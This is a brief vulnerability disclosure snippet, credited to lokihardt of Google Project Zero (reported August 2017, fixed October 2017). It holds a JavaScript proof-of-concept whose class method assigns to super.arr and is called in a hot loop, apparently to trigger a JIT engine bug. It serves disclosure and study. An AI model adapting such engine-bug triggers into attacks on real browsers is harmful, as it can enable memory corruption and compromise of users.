- Report: Aug 2017
- Fix: Oct 2017
- Credit: lokihardt of Google Project Zero
class MyClass {
constructor() {
this.arr = [1, 2, 3];
}
f() {
super.arr = [1];
this.x;
}
}
let c = new MyClass();
for (let i = 0; i < 0x10000; i++) {
c.f();
}